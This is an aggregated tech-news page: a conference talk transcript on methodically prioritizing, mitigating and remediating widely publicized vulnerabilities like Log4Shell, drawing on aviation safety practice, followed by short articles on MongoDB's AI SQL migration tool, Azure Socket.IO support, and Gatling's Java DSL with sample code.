Presentation: Celebrity Vulnerabilities: Effective Response to Critical Production Threats

MMS Founder
MMS Alyssa Miller

Article originally posted on InfoQ. Visit InfoQ

Transcript

Miller: I’m Alyssa Miller. We’re digging into celebrity vulnerabilities. I’m a hacker, a researcher, a cybersecurity author, and a cybersecurity executive. I’m also a pilot. Last year, I tackled something super exciting, a lifelong dream. I’ve always wanted to be a pilot, but it always seemed out of reach. Then the stars aligned last year, I started training. It took a few months, and then I ended up buying my own airplane. It took a few more months, then I finally passed my check ride, as they call it, which is how I earned my private pilot certificate. I’m officially a pilot. Being a pilot, and being an aircraft owner as well, I learned a lot about what the aviation community does, when it comes to handling a crisis. There’s a lot of things obviously that can go wrong in aviation. I’m going to share some of them with you. We’re going to talk about a little bit of what the FAA in the United States does, because that’s what I’m most familiar with. A lot of these processes are similar with other agencies around the globe. I want to talk to you a little bit about this, because as I started to learn this, I realized there’s some applicability here to how we handle cybersecurity incidents.

Aircraft Grounding Analogy to Celebrity Vulnerabilities

One aviation incident, we’ll call it, or critical emergency you might be very familiar with, is this one here. This is the Boeing 737 MAX 8. I’m sure a lot of you heard in the news at some point about the issues with the Boeing 737 MAX 8. There were problems that led to a couple crashes that killed a lot of people. As a result, all 737 MAX 8 aircraft around the globe were grounded. They didn’t know what was wrong. They knew there was a big problem on their hands, and they knew they had to fix it. They found out pretty quick what was causing it, but they really had to figure out how they were going to fix it. In the meantime, they grounded all of these planes. That ended up changing a lot of flight routes. It affected a lot of travelers when these airlines suddenly had fewer planes that they could fly. Some like Southwest Airlines in the United States were really heavily hit because 737s are all they fly. They had a lot of MAX 8 versions of the 737. They were able to recover. They have a lot of resources, a lot of aircraft in these various airlines. Overall, they were able to recover fairly easily.

What happens when it’s not an airline being impacted? What happens when it’s someone like me, who maybe only owns one aircraft? This aircraft here is not mine, but this is a Cirrus SR22. Very popular aircraft. Cirrus has been in the market for about 20 to 25 years, something like that. They’ve been making this aircraft. This aircraft is powered by this engine, a Continental IO-550. You don’t need to know all that information, but understand that the way airplanes come together in the first place, it’s not like cars. A lot of times you build a car, the same automaker that builds the body and builds the seats and does all that stuff, builds the engines and everything else. Airplanes aren’t like that. Airplanes are a lot like how we build software. Different companies make different components and we plug all that together into an aircraft. Continental is a company that makes small aircraft engines. They make piston aircraft engines like this IO-550. Why am I talking about this? That IO-550 from Continental has an issue right now, and it’s caused the grounding of a lot of planes. One of the ones in particular that’s heavily hit is the SR22. Why is it grounded? Because they have an issue with a crankshaft counterweight. You don’t even need to understand what that is either. Understand that because of this issue, they’ve had to ground a bunch of planes. People who only have one plane suddenly don’t have an airplane to fly. I got to thinking, that sounds like how we approach when we have celebrity vulnerabilities. It’s this all-hands-on-deck, we have to stop all of the development we’re doing, no development work goes on, we have to fix these problems. That’s all we can do. It’s like the grounding of an aircraft.

Celebrity Vulnerabilities – Apache Struts

What do I mean by celebrity vulnerabilities? That’s a term I borrowed from a coworker. When I’m talking about celebrity vulnerabilities, I’m talking about those big, open source, most cases, vulnerabilities that get all the press in the media that we have dealt with quite a bit in the last five to six years. One of the first ones that I can really remember was this vulnerability, the CVE-2017-5638. It was a Struts vulnerability. When it came out, it was fairly critical. It was a high CVSS score. Everybody was worried about it. It was very high severity. A lot of us rushed out and fixed it. Unfortunately, for this company, Equifax, they missed fixing some of them. As a result, they got breached. Actually, at the time, the biggest breach of consumer data in the history of recorded breaches. It all stemmed from this Struts vulnerability that had been well publicized, but didn’t necessarily get fixed properly.

Log4j

A little more close to home, some of you might remember a little more recent past, after these 164 million consumers were impacted, we had a new vulnerability show up. It was in this cool little package, Java developers might remember, Log4j. How many of you use that? We had that cool vulnerability, Log4Shell. Everybody blew up. It was all the news, all the rage. Everybody was scrambling to fix it. We had CVE-2021-44228. Then we had CVE-2021-45046. Then we had CVE-2021-45105. All of these vulnerabilities that started showing up related to Log4j. We started fixing when the first one was announced. Then we realized, there’s another vulnerability to that version, so we need another new version of Log4j. Then they released another version of Log4j. The reality of all of this was, yes, 91% of Java apps in the world were impacted by this. If you’re a Java developer, chances are you had to drop everything, you had to run out and reset all of the work you were doing and focus on fixing this vulnerability. What of course made it more complex was not only were 91% of those Java apps impacted, 61% of those were impacted via some indirect dependency. It wasn’t even a direct dependency that developers had included in their code. It was, I’ve got a dependency that also brings in Log4j with it. It wasn’t always the easiest to discover. I got that data from my friends at Snyk, who released quite a bit of information regarding these particular vulnerabilities. That was 2021.

Spring4Shell

It wasn’t too long after that we did the whole thing all over again, because we had this wonderful vulnerability that we named Spring4Shell. Now it’s Spring, another super common package that a lot of people use in their code. We had one CVE, then two CVEs, then three CVEs again. We went through the same thing. As researchers found the first vulnerability, then they started digging deeper, they started finding more vulnerabilities. Before we knew it, we had three really high severity vulnerabilities in Spring that we had to deal with. Again, developers across the globe were called upon to stop everything they were doing, drop it all on the floor, and go to work trying to fix these vulnerabilities in all of their software. It’s exhausting.

OpenSSL

Then, the end of last year, OpenSSL shows up on the scene. We get rumors start popping up, and they start getting confirmed by the maintainers that there’s some big announcement about a big vulnerability coming, but no information until five days later. What happened five days later? After everybody dropped everything, got all excited and all set to fix yet another celebrity vulnerability, they dropped the news of the vulnerability and they just weren’t even that serious. Over time, we became conditioned by these multiple celebrity vulnerabilities that we need to drop everything and rush out and fix it because there’s going to be this critical vulnerability. As soon as attackers find out about it, they’re going to come knocking at our door, they’re going to be hacking our applications, and we need to fix it. Then we got slapped in the face by OpenSSL when it ended up being much ado about just a little bit. There’s got to be a better way.

Avoiding ‘All-Hands-On-Deck’ Approach

Throughout these, I was right there with you. I’ve been working in cybersecurity the last 15 years, but I was on the other side of this. I was on the side of the cybersecurity folks who were like, this is really scary. I was also, in my experience, fighting for how can we not stir up the whole world and upheaval everybody’s development pipelines, shut everything down, just to fix this? How can we be smarter? That’s what I was fighting for in my organizations as these things were going down. When it comes to celebrity vulnerabilities like this, we have to work on avoiding that all-hands-on-deck approach, that drop all the things you’re working on and come fix this, because it’s not necessary. It’s not efficient. It doesn’t make us more secure necessarily. Ultimately, it conditions us for incorrect behaviors.

Let’s talk about a real process. This process is based on my experience working with these vulnerabilities over the last number of years. I’m going to share with you what I learned, some of the things we were able to do in my organizations in order to address these in a more efficient fashion. When it comes to avoiding that all-hands-on-deck approach, there’s three key factors we need to keep in mind. First is prioritization. We need to look at, truly, what is the most immediate attack surface? With Log4j initially, everybody was screaming, upgrade Log4j to the latest, you’d have to get the latest and greatest. As it turns out, if you weren’t on a 2.x version, and actually a version higher than 2.8, you were not vulnerable to this JNDI vulnerability everybody was so worried about. First of all, we just have to understand the most immediate attack surface. Then we need to really establish some classifications for in-scope items, because we’re going to use that then to lay out a roadmap for the actions that we are going to take. In the aviation community we have this saying that, in an emergency, first thing you should do is wind your watch. The point of that is, when you’re presented with an emergency in aviation, we don’t want you to instantly react and start flailing around trying to do all the things. We want you to stop, think methodically, and work through a checklist on how to address the situation to try to troubleshoot it, to try to resolve it, or then to respond in an emergency fashion. We need to do the same. That starts with prioritizing.

Next, we need to look at mitigations. Mitigations do a few things for us. They focus on delaying the attacks, not perfection. They need to be things that we quickly implement. We should be looking to layer them to complement those various mitigations, so that what we end up doing creates an overall decently secure situation while we then go and try to work on fixing the vulnerabilities in our code. Then, finally, we have to work on that remediation. How are we actually going to remediate the vulnerabilities in our code? We need to focus on, what is critical that has to be fixed right now. That goes back to our prioritization. Versus, what can we fix via business-as-usual processes, our normal vulnerability management program, perhaps? How do we leverage our backlogs to do that? How do we establish ongoing tracking to make sure that we do complete all the remediation in some specified timeline? Let’s dig into this process a little bit more. Along the way, I’m going to help you see how some of those approaches in aviation can be a great guide for us.

Prioritize – Identify the Most Immediate Attack Surface

Let’s start with identifying the most immediate attack surface. In aviation, when there’s an emergency, one of the first places we can turn is this here. This is what we call the equipment list, or the minimum equipment list, or the standard equipment list. It gets a lot of different names. This is the equipment list for my airplane that you saw way back at the beginning. These are all the things that were installed in that aircraft the day it rolled off the assembly line. As things are added and removed, all of that has to be noted in logs. What that does is that means I constantly have an inventory of exactly what is in my airplane, so that if news comes out about a particular defect that needs to be addressed, I know exactly whether or not it applies to my aircraft. It’s a wonderful thing. When it comes to software now, we understand that that’s not always the easiest thing to do. I alluded to this before. Modern day open source development, we have this idea of dependencies. Those dependencies can have their own dependencies, which can then have their own dependencies. I’m sure many of you are familiar with the idea of a dependency tree. It’s those indirect dependencies that get us. That’s what bit Equifax with that Struts vulnerability. They missed it because it was buried a few layers deep in their transient dependencies of some open source package that they had included in their software. They didn’t even know it was there. It got discovered by an attacker, they got breached.

There’s tools to help with this. Of course, typically, this is something that you’d love to see in your development pipeline. I talked about Snyk before, Black Duck, WhiteSource, ShiftLeft. These are all companies who make what we call software composition analysis, which is a tool that goes through your dependencies and discovers where you have open source dependencies, and alerts you when they’re vulnerable. That’s a great preparatory thing, but we’re not talking about preparations here. We’re talking about, what do you do when you find this in your environment, or there’s a new celebrity vulnerability you need to figure out if it’s in your environment? The good news is, in each of those cases, each of those celebrity vulnerabilities, starting with Log4j, each one of these tool vendors released detection tools as soon as they were able. In most cases, they could be accessed via their freemium product. You could download a free copy of Snyk for instance. You could connect it to your repo. You could let it run. It would go through your dependency tree, and it will tell you immediately if you had a Log4j dependency anywhere in that dependency tree. You can look to these tools to help you. What you’re trying to do is understand, first of all, do you even have that dependency? Then, secondly, and these tools do this to varying degrees, is that vulnerability even reachable in your code? Because if it’s in a particular function that you’re not even using, and there’s no way to access that particular object or something through the functionality of your application, then that’s probably something you can prioritize further down.

Prioritize – Establish Classifications of In-Scope Items

That leads to our next facet of prioritization, which is establishing classifications of in-scope items. You need to understand what is in scope. In the aviation world, we release, and the FAA calls these Airworthiness Directives. There’s different terms for them in different agencies. Ultimately, they’re the same thing. It’s a notice that says, this defect was discovered, and here’s the aircraft that are affected or potentially affected. They list them by model number, by serial number, by manufacture date, all sorts of different criteria that tell you, this plane is involved, or it’s not involved, so that you can look at it very quickly and know, does this apply to me or not? They then go into further in many of these Airworthiness Directives talking about, these are aircraft that are most critical and need to be addressed right away. These are aircraft that can wait until a later date, and so on. That’s what we want to do with the software. We want to look at the software and say, here’s the applications that we need to address right away. Here’s ones that we’re going to address second, or we might use some type of mitigating control, or whatever, and here’s ones that are down the road a little bit later to be addressed.

How do we do this? We want to look at three key facets. We want to look at risk. We want to consider the risk. Our critical applications are probably ones that we want to prioritize higher. We might look at the user load, is it an application that’s used by a lot of users, or is it something that’s an internal utility app? What about monitoring capability? Those applications that we have no monitoring for, we’re probably going to consider a little higher risk, because we can’t watch them to see if there’s unusual activity or something that’s actively trying to exploit the vulnerability that’s just been announced. Then we want to consider exploitability. Is it internet facing? If it’s not, obviously, that’s typically something where we can lower the risk picture of that, and it’ll probably be in a later classification. What level of protected access does it have? Maybe it’s something that’s not available to the internet, but we do expose it to clients over certain connections. Those connections might be a way that attackers could find their way to that particular application. What other environmental aspects? How is it hosted? Where is it hosted? Is it hosted in a cloud? Is it a SaaS application? Do you have an on-prem data center that it’s being hosted in? What security controls are in place? All of that is going to play into not only which classification does it go in as far as for remediation, but even, how do you remediate it, or how do you look at mitigating controls?

Then you want to look at just the ease of addressing it. Is it a current code base, or is it something that’s out of date? We’re looking here for those low hanging fruit items. What can we knock out quickly? Maybe those are ones that we want to do first, because we can just knock them out, while we spend more time digging into ones where maybe it’s more difficult. Is the upgrade that’s needed going to be backward compatible. When we were looking at Log4j, if you were on 2.8 and you were trying to get to, I think 2.14 and then 2.15, there wasn’t necessarily backward compatibility in all of the objects and all of the methods within those versions. That was problematic. Or, worse yet, if you had a 1.x version, it definitely wasn’t backward compatible. You need to consider that as you’re classifying your applications. Then, again, mitigations. Do you have some other way to mitigate the risk of that application in the short term? That can be a way that you also classify those applications.

Prioritize – Lay Out a Roadmap for Actions

Then you’re going use that prioritization to lay out a roadmap for your actions. In the aviation community, I talked about those Airworthiness Directives or those ADs as we call them. This is what happens in those. Remember, I was talking about that IO-550 engine that’s in the SR22 and other aircraft? This is an excerpt from the Airworthiness Directive for that. You see, they very specifically lay out the steps for how you go about remediating. It’s a plan. Each one of these steps gives you instructions based on what’s discovered. As you get through this further, it tells you different things, not shown here, but as you discover different elements, what are the required actions. In some cases, you might have to remove the entire engine and have it rebuilt. In other cases, you don’t have to do anything at all. Having that plan of action and understanding what you’re going to do for each classification is important. What does that look like when we’re talking about our applications? Those roadmaps can be one of two things. They could be sequential. It could be, we’re going to implement this mitigation first. Then we’re going to do this set of remediations. Then we’re going to do another set of remediations. Or they might be things that you can do in parallel. It might be mitigations and remediations that are happening at the same time. Maybe somebody is working on network mitigation while your developers are starting to dig into the code and figure out how are they going to get to the next version of that package. Sometimes these intermix. You might be setting up some that are concurrent, and some that are sequential.

Laying out that roadmap is crucial, because this is part of having a plan. That’s back to that wind your watch thing I mentioned, where we talk about in the aviation community: slow down, address it methodically. Look at the situation, understand what you’re being faced with, and prioritize appropriately. Then lay out the plan for how you’re going to get to remediation. That is the single biggest key. When we went through this with Log4j, I was the sole person in that room saying, we’re not going to go in and send developers hog wild trying to fix every single bit of code. Let’s stop, and let’s talk about this, what are the aspects, or what are the characteristics of the applications that we need to fix first? Let’s list out the mitigating controls that we can put in place, and let’s lay out a plan for how we’re going to address these.

Mitigate – Focus on Delaying Attacks, Not Perfection

Let’s dig into mitigating controls. What are mitigating controls? First of all, mitigating controls are focused on delaying attacks. They are not about perfection. When I talk about the 737 MAX 8, the problem with that airplane ultimately, is this thing right here. It’s what we call an angle of attack sensor. Basically, what this sensor tells you is, what is the aircraft’s pitch relative to ultimately its forward motion. That’s not 100% accurate. It basically says, if I’m flying level and straight, that’s a low angle of attack. If I pitch up, now my angle of attack increases. If I pitch up and I also start to climb because of that pitch, that could actually decrease it a little bit, depending on speed and other things. It’s about, what is my relative motion through the air? It’s this angle of attack sensor that was the problem. If you know about the situation with the 737 MAX 8, you know what they didn’t do was go and immediately start trying to fix these sensors. Instead, they created a software fix to address the hardware problem. Does this sound familiar to you developers, because I’ve been there?

What do we do in our space, when we’re dealing with a vulnerability like one of these celebrity vulnerabilities? We want to look at what mitigations do we have. With Log4j, I was very fortunate that we had Akamai as our CDN. Along with it as a CDN, it also comes with a web application firewall. AWS has their WAF. Cloudflare has a web application firewall. What that did was that gave us an immediate ability to start to look for those incoming JNDI requests that were the problem. It was basically an exploit of that particular functionality within Log4j, so we could use our web application firewalls to do that. We also had endpoint protection. In my organization, it was CrowdStrike. You might also have Carbon Black, or you might be using Microsoft Defender for endpoints, or any other of the myriad of endpoint detection and response tools that are out there in the market. Again, there, it wasn’t long after the vulnerability was announced that those makers were releasing detection rules that could find that and help block against attacks. It wasn’t fixing the underlying software at all. It wasn’t going into the code of the applications and fixing it, but we had these other layers that could at least help prevent some of those attacks. Of course, right away, people started to find ways to bypass the WAF rules and things like that, and it was a back and forth. Again, it’s not about perfection. It’s about delaying the attacks, while you take some time to actually fix the code and take care of that particular package that was vulnerable in your software.

Mitigate – Quickly Implemented to Reduce Risk

Mitigations, the next key is they need to be quickly implemented to reduce risk. With the Cirrus aircraft and that IO-550 from Continental, Cirrus came out right away and grounded all of their own aircraft and suggested anybody that was flying an affected aircraft do the same. That’s a mitigating factor. It’s something that can be done very quickly to make sure that people didn’t die. That’s what it comes down to. In their case, grounding planes was a quick and easy mitigating control. Again, doesn’t fix the problem, but delays the issue until the problem can be fixed. One thing that you can leverage here, if you hadn’t heard of this before, is the ModSecurity Core Rule Set from OWASP, Open Web Application Security Project. Get familiar with them at owasp.org. The ModSecurity Core Rule Set is just a set of web application firewalls that are vendor agnostic. Many vendors’ web application firewalls can use these general rules from the ModSecurity Core Rule Set to implement new detections and protections in their application firewalls. As you can see here, it was very quickly after the vulnerability in Log4j was announced that this rule set was updated with detections and protections for that Log4j vulnerability. It was continually updated as the multiple CVEs were being released, and new details were being found, new bypasses were being discovered. Again, they were updating it, trying to detect those bypasses and continue to protect us against attack. That’s an easy way to implement web application firewall rules. They’re going to keep you safe, again, while you work on other tactics to remediate the vulnerability in your environment.

Mitigate – Layer or Complement Mitigation Techniques

Then, finally, from the mitigation, we need to remember that we want to look for ways to layer or complement these mitigation techniques, because they’re not perfect. Where we know there’s a weakness in one particular mitigation, we want to add in other mitigations to help. I talked before, like those web application firewalls, and those EDR tools, these endpoint detection response tools, those are two ways that even if they bypass the web application firewall, maybe that endpoint tool will find the vulnerability, and see the attack and block it. What does that look like in the aviation community, when we talk about that 737 MAX 8? Take a look at this green column over here. This is everything they did to implement that software fix. Notice, it’s not just one thing. They made adjustments to the MCAS. That’s the software that we’re talking about here. That software is ultimately what reads the input from the angle of attack sensor. It was getting erroneous data from that sensor and reacting in ways that weren’t predictable. What did they do? They, first of all, made sure that it wouldn’t just accept one input, it had to get input from multiple sensors. They added a disagree light then that said, something’s going on here, I’m not getting the right information, one of these sensors is wrong. Rather than react and pitch the airplane down into the ground, which is what was happening, it instead did nothing and just said, the sensors are giving me two different messages. They also added a pilot override, which was another problem, as these planes were pitching down into the ground, the pilots were unable to override the system easily. Then they focused on pilot training, because it was found that the pilots didn’t know how to react in this situation.

What does that look like when we’re talking about mitigations? When we’re talking about mitigations, we want to block wherever possible. We can block the attack, or we can block access to certain functions. We want to do that. That is the key. That is our best mitigation, because that stops the attack. If we can’t do that, we want to at least focus on isolation. How can we isolate those vulnerable apps? How can we keep them in their own environment, so at least if something happens, and they get breached, it doesn’t become a launchpad for much greater scope of attack against our organization. We want to make sure we layer that in with the blocking. Then, finally, we want to log everything. Turn on all the logging you can in these moments, because your security people are going to be looking for what we call indications of compromise. They’re going to be looking for those attacks or those attempted attacks. Turning on logging on your CDNs, on your WAFs, on your web servers, start looking through those access logs, turn up the logging capabilities, turn up the logging capability within your application itself. Then make sure you’re feeding that somewhere. Or at least creating that data so your security team can come along and take care of digging through that to see if indeed someone’s trying to attack you.

Remediate – Define Critical Remediation vs. Business-As-Usual

Now let’s talk about remediation. Remediation is where we’re really fixing the applications. We’re going in and we’re replacing those vulnerable libraries, or we’re making some code fix, or doing whatever we need to. I say, we need to look first and foremost. This was a big sticking point for me when we were dealing with Log4j. It was, what do we have to fix right away, versus what can I log to my vulnerability management database? We just fix it in our normal course of addressing vulnerabilities. This is key. This is a core aspect to this because this is how you get out of the mode of fix it all, fix it all right now. We shut everything else down. Looking at the aviation community, now I’m going to talk about my plane. This is my airplane. This is a Piper PA-28. It’s the Cherokee series of aircraft. There are a bunch of different models of this. What you see on the right is what we call a wing spar. That wing spar is what attaches the wing to the fuselage of the aircraft. You can see there, it’s basically a steel I-beam sort of thing that runs through about maybe two-thirds of the wing and it has that little piece that sticks out, that gets bolted to the fuselage of the aircraft.

My aircraft, the PA-28, that type of aircraft has a problem where these things literally experience corrosion, and they experience fatigue cracking, and it can literally lead to the wings falling off. The FAA came out with guidance that specified what aircraft based on what characteristics were susceptible to this, and needed varying levels of investigation, repair. It was based in part on how many hours the plane had flown, but also what type of use the plane had seen, and some other factors. You had to calculate all this out. We want to be doing the same when it comes to our software. We want to use a risk matrix like this. Maybe you’ve seen this, this works great. We want to understand, what are the applications that have to get fixed right now? What are the ones that are running Log4Shell 2.8 or greater, they’re internet accessible, and they’re not behind a WAF, web application firewall. Those are obviously the most critical, because we can’t mitigate it. They’ve got the vulnerable versions, and they’re open to the world. We got to fix that first. If it’s internal and it’s running Log4j 2.5, which wasn’t vulnerable to that particular attack, later, it was vulnerable to one of the other CVEs, but maybe that’s one we can decrease in risk and not have to remediate as quickly. Laying out those remediation timelines, and saying, for those ones that are less critical, rather than make that the thing we’re going to just fix as soon as possible. Let’s go back, maybe we have vulnerability management standards that say we’ve got 60 days to fix that. Let’s log it as such and fix it using that process.

Remediate – Leverage your Backlogs

To that end, that means, let’s leverage our backlogs. Even if you don’t have a vulnerability management program, for those apps that don’t fall into that critical got to fix it right now category, log an issue on your backlog. Put it out there, make it a P1, P2, whatever fits for you, but put it on the backlog and fix it in your next release. Now it’s just part of your normal process. An example of this with that wing spar situation, I mentioned the corrosion. First of all, when the FAA released it, it wasn’t, ground your aircraft and look right now. It was, within the next 100 flight hours of the aircraft, you have to go and complete this, installing inspection panels and whatever. You can see it was 100 hours or 12 months, within 12 months. There, it’s not a, you can’t fly this plane until you do this inspection, and comply with this service directive, or this Airworthiness Directive. No, they gave you time, so that you could continue your normal work, and then just fix it. Aircraft have to undergo inspections every 12 months anyway. Maybe when you go in for your annual inspection, you could just take care of it then, business-as-usual. Yes, throw it in your backlog. Put it out there, fix it the way that you fix all your other security vulnerabilities. It’s a high-risk severity, critical vulnerability that everybody is screaming about in the media. It’s a celebrity vulnerability. Everybody says you got to fix it now. Let’s be realistic about this. Let’s look at where we can afford the time. Let’s not scramble to fix everything at once. Let’s fix the things that have to be fixed, put everything else in the backlog.

Remediate – Establish Ongoing Tracking of Each Classification

Then we do need to track, ongoing, what are we going to do about this? Because you know as well as I do what happens in these cases, is if you don’t track this, they get forgotten about, they never get fixed. In the aviation world, remember I mentioned those annual inspections? This is what I keep. It’s called a Squawk list. Every little thing that I notice is not right about my airplane, things that don’t affect safety, but they’re just a problem that I want to have addressed, I keep a list. Then, for some of them, maybe when I take it in for an oil change, I have them look at it, or when I take it in for annual, I have them look at it. I keep a list and you see here I note the resolutions when they’ve been achieved. For that last one in particular, you can see there it was inspected. I’m not ready to say that it’s resolved, so I’m going to keep looking at it and keep inspecting it over time to make sure that it isn’t a crack that I have to worry about.

We need to do the same thing with the software. We need to track each of the apps in each of those classifications and say, so for those critical ones, the ones I said I have to fix right now, we’re at 90%, we still have 10% to go. For ones that we completely backlogged, they were low severity, we’ve got 95% of them we haven’t touched yet, and only 5% because maybe they were low hanging fruit, and they were easy to fix, we fixed. Keeping that tracking going is how you make sure that you get through all of these. It’s what’s going to get your security team off your butt and stop bugging you to fix it. Because you can say, “We’re working on it. We’ve got this. They’re logged. They’re going to get fixed in this timeframe. We’re on track. We’re this far along.” That’s going to be really important. It makes sure that you don’t get any surprises like we saw with Equifax.

Review

Just to review, again, prioritize, mitigate, and then remediate. Slow down, fix it one step at a time in a methodical process. That is the key here. Avoid that all-hands-on-deck approach. Remember this quote from Winston Churchill, “Perfection is the enemy of progress.” If we are so focused on completely eradicating a vulnerable package from our environment, we’re going to get so wrapped around trying to be perfect, we’ll never get anything fixed. We will fail to protect ourselves, and the chances of us getting breached, go up.

See more presentations with transcripts

Subscribe for MMS Newsletter

By signing up, you will receive updates about our latest information.

  • This field is for validation purposes and should be left unchanged.


MongoDB automates SQL translation for its NoSQL database • The Register – TheRegister

MMS Founder
MMS RSS

Posted on nosqlgooglealerts. Visit nosqlgooglealerts

MongoDB has built an AI-powered SQL converter designed to help developers move from relational databases to its document-oriented NoSQL system.

One analyst told us that there are more to database migrations than converting SQL, and it remains unclear how much the product features would help productivity given the scale of migration projects in terms of testing and validation.

The move, which automates the translation of SQL into MongoDB’s own query language, is one of a raft of new GenAI-type features to its database service, Atlas, which aims to smooth the developer experience and save time writing code.

MongoDB Compass lets developers use natural language to write executable MongoDB Query API syntax while incorporating other features. For example, developers can type “Filter pizza orders by size, group the remaining documents by pizza name, and calculate the total quantity,” to generate the relevant code, MongoDB said.

Meanwhile, MongoDB Atlas Charts allows users to create data visualizations using natural language.

MongoDB Relational Migrator promises to automatically convert SQL queries and stored procedures in legacy applications to development-ready MongoDB Query API syntax by using a large language model. All three are available in preview.

Cheif prodct officer Sahir Azam told The Register that between a quarter and a third of MongoDB’s customer projects have involved migrating an old database to its JSON-based system.

“A developer can either copy and paste in an existing SQL statement from their code or we can connect to a relational database and import view definitions or stored procedures, which are complex business logic in the database,” he said. “It’ll analyse that code via a large language model, and then spit out the appropriate MongoDB query language equivalent. And then the goal is to make that more accurate over time using reinforcement learning.”

Analyst Matthew Aslett, veep and research director with Ventana Research, said: “Database migrations are far from easy, they’re very costly, very complex. Anything that can help facilitate them is a good thing and it is a useful use case, particularly for the generative AI capabilities. Obviously, it’s something that can look very good in a simple demo, but if you’re looking at large scale, really complex queries, it remains to be seen how helpful it will be.”

James Governor, co-founder of developer-focused analyst Redmonk, said MongoDB was not necessarily ahead of the competition in exploiting generative AI.

“Generative AI is so powerful that everyone is able to take advantage of them,” he said. “It’s not the competitive advantage in a sense of using OpenAI or not using it. GPT4 is going to be arriving soon and that’s going to be a lot better at writing code. It’s going to be able to write code for any of these platforms, and it’s going to understand databases. It’s not that any of the database companies are going to be massively ahead but on the other hand, you can’t shut yourself off from those sorts of productivity enhancements.” ®

Subscribe for MMS Newsletter

By signing up, you will receive updates about our latest information.

  • This field is for validation purposes and should be left unchanged.


Microsoft Introduces Public Preview of Socket.IO Support on Azure Web PubSub

MMS Founder
MMS Steef-Jan Wiggers

Article originally posted on InfoQ. Visit InfoQ

Microsoft recently added support for Socket.IO on Azure in public preview, allowing developers to leverage a fully managed cloud solution through Web PubSub for Socket.IO.

Azure Web PubSub for Socket.IO is a new capability that manages client connections for an application using the Socket.IO library – an open-source library for real-time messaging between clients and a server. Instead of managing multiple Socket.IO servers or adapters in a self-hosted Socket.IO, developers can migrate it to Web PubSub for Socket.IO.

When developers host a Socket.IO app themselves, clients establish WebSocket or long-polling connections directly with their server. Maintaining such stateful connections places a heavy burden on the Socket.IO server – limiting the number of concurrent connections and increasing messaging latency. An option is to scale out to multiple Socket.IO servers. Yet, it requires a server-side component called an adapter, which introduces an extra component a developer needs to deploy and manage, including writing additional code.

By bringing Socket.IO to Azure, Microsoft takes away handling scaling and implementing code logic related to using an adapter from the developers.

Simple Overview of Web PubSub for Socket.IO (Source: Microsoft Learn)

Client code to a client with Web PubSub for Socket.IO would look like:

/*client.js*/

const io = require("socket.io-client");
const socket = io("", {
    path: "/clients/socketio/hubs/Hub",
});

// Receives a message from the server
socket.on("hello", (arg) => {
    console.log(arg);
});

// Sends a message to the server
socket.emit("howdy", "stranger")

While code for a Socket.IO server integrated with Web PubSub for Socket.IO would look like:

/*server.js*/

const { Server } = require("socket.io");
const { useAzureSocketIO } = require("@azure/web-pubsub-socket.io");

let io = new Server(3000);

// Use the following line to integrate with Web PubSub for Socket.IO
useAzureSocketIO(io, {
    hub: "Hub", // The hub name can be any valid string.
    connectionString: process.argv[2]
});

io.on("connection", (socket) => {

    // Sends a message to the client
    socket.emit("hello", "world");

    // Receives a message from the client
    socket.on("howdy", (arg) => {
        console.log(arg);   // Prints "stranger"
    })

Kevin Guo, a product manager at Microsoft, explained in a Socket.IO blog post:

What’s more important is that server and client apps continue using the same and familiar Socket.IO APIs. With only a few lines of code, you can get any socket.io apps running locally to Azure.

In addition, Martin Flower, a distinguished engineer at Microsoft on .NET, tweeted:

We added socket io support natively on Azure! Of course, I prefer SignalR, but for the nodejs apps out there, this can significantly reduce the complexity of scaling your http://socket.io based applications.

Since Socket.IO is hosted in Azure Web PubSub, the pricing and availability details are available on the pricing page.

About the Author

Subscribe for MMS Newsletter

By signing up, you will receive updates about our latest information.

  • This field is for validation purposes and should be left unchanged.


Gatling Supports Java DSL for Java and Kotlin Based Performance Tests

MMS Founder
MMS Johan Janssen

Article originally posted on InfoQ. Visit InfoQ

The load testing tool Gatling is designed for ease of use, maintainability and performance. It originally provided a Scala DSL to write test scenarios. Some time ago, a Java DSL was released making it possible to write test scenarios in Java or Kotlin.

Having dedicated a paragraph of their Quickstart to Picking the Right Language, Gatling recommends using Scala or Kotlin for writing tests for developers who already use one of those languages. Otherwise, Java is recommended because it’s widely known, requires less CPU for compiling and is easier to configure in Maven or Gradle.

Java, Kotlin or Scala: Which Gatling Flavor is Right for You?, an article published one year after the release of the Java DSL, shows that 35 percent of users work with the Java DSL. In the article, Gatling clearly states that despite the quick popularity of the Java DSL, they plan to keep supporting the Scala DSL, and users are free to choose between Java, Scala and Kotlin for their tests.

Consider a traditional test scenario in Scala where eight users are gradually starting during ten seconds, zero users after zero seconds, four users after five seconds and eight users after ten seconds. Then each user executes a loop five times to verify that both the car and the carpart endpoint return a HTTP status code 200:

class BasicSimulationScala extends Simulation {
    val httpProtocol = http
        .baseUrl("http://localhost:8080");

    val scn = scenario("BasicSimulation")
        .repeat(5){  
             exec(http("car").get("/car")
            .check(status.is(200)))
            .pause(1)
            .exec(http("carpart")
            .get("/carpart")
            .check(status.is(200)))
        }

    setUp(
        scn.inject(rampUsers(8).during(10))
    ).protocols(httpProtocol);
}

The test may be run with the Gatling script on Linux/Unix:

$GATLING_HOME/bin/gatling.sh

Or on Windows:

%GATLING_HOME%bingatling.bat

Alternatively, build tools such as Maven can be used to run the test by specifying the directory of the scenario in testSourceDirectory and configuring the Scala Maven Plugin and the Gatling Maven plugin:


    src/test/scala
    
        
            net.alchim31.maven
            scala-maven-plugin
            ${scala-maven-plugin.version}
            
                
                    
                        testCompile
                    
                    
                        
                            -Xss100M
                        
                        
                            -deprecation
                            -feature
                            -unchecked
                            -language:implicitConversions
                            -language:postfixOps
                        
                    
                
            
        
        
            io.gatling
            gatling-maven-plugin
            ${gatling-maven-plugin.version}
        
    

Finally, the test can be executed:

mvn gatling:test

The same scenario can be expressed with the Java DSL where: Duration.ofSeconds(10) should be used instead of 10; status() instead of status; and repeat(5).on(...) instead of repeat(5){...}:

public class BasicSimulationJava extends Simulation {

    HttpProtocolBuilder httpProtocol = http
        .baseUrl("http://localhost:8080");

    ScenarioBuilder scn = scenario("BasicSimulation")
        .repeat(5).on(
            exec(http("car").get("/car")
            .check(status().is(200)))
            .pause(1)
            .exec(http("carpart")
            .get("/carpart")
            .check(status().is(200)))
        );

    {
        setUp(
            scn.injectOpen(rampUsers(8).during(Duration.ofSeconds(10)))
        ).protocols(httpProtocol);
    }
}

While these changes between the Scala DSL and the Java DSL seem relatively small, the biggest advantage for the users is that all the custom logic around the test may be written in Java as well.

